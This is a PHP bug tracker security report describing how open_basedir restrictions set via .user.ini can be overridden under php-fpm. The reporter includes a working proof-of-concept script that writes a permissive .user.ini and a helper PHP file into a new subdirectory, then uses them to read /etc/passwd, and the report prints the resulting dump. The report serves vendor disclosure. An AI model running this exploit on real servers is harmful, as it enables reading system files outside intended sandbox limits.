php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #72279 open_basedir could be bypassed if it's set by .user.ini
Submitted: 2016-05-28 06:36 UTC Modified: 2016-05-29 08:37 UTC
From: firesun dot cn at gmail dot com Assigned:
Status: Duplicate Package: Safe Mode/open_basedir
PHP Version: Irrelevant OS: Ubuntu
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: firesun dot cn at gmail dot com
New email:
PHP Version: OS:

 

 [2016-05-28 06:36 UTC] firesun dot cn at gmail dot com 
Description:
------------
On php-fpm we could set the open_basedir by ".user.ini". 
For example, I have "open_basedir=/var/www/html/" in /var/www/html/.user.ini. I means all the phps in /var/www/html/ should obey the rules. Unfortunately, the setting could be overwritten.
I could create a directory "attack" and put "open_basedir=/" in /var/www/html/attack/.user.ini and the phps in /var/www/html/attack/ could bypass the open_basedir set by "/var/www/html/.user.ini".

What's more, all these things could be done in a evil php which is located in /var/www/html/. (It's important that the evil php and .user.ini are in the same directory and the evil php could ignore the setting set by .user.ini) The exp below shows a example how to bypass the open_basedir setting and successfully read the file.

Test script:
---------------
<?php 
@set_time_limit(0);
@ignore_user_abort(true);
@ini_set('max_execution_time', 0);
echo "normal<br>";
echo file_get_contents("/etc/passwd");
echo "<br><br>";
echo "attack<br>";
mkdir("attack/",0777); 
file_put_contents("attack/.user.ini","open_basedir=/");
file_put_contents("attack/attack.php",'<?php echo file_get_contents("/etc/passwd");');
sleep(ini_get("user_ini.cache_ttl")+1);
$url=$_SERVER['REQUEST_SCHEME'].'://'.$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; 
$url=dirname($url)."/attack/attack.php";
echo file_get_contents($url);
?>

Expected result:
----------------
I should not see any output.

normal


attack

Actual result:
--------------
The exp successfully read the file.

normal


attack
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:109::/home/syslog:/bin/false messagebus:x:105:110::/var/run/dbus:/bin/false uuidd:x:106:111::/run/uuidd:/bin/false sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-05-29 08:37 UTC] remi@php.net
-Status: Open +Status: Duplicate
 [2016-05-29 08:37 UTC] remi@php.net 
Duplicate of 72280
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Sun Oct 27 16:01:27 2024 UTC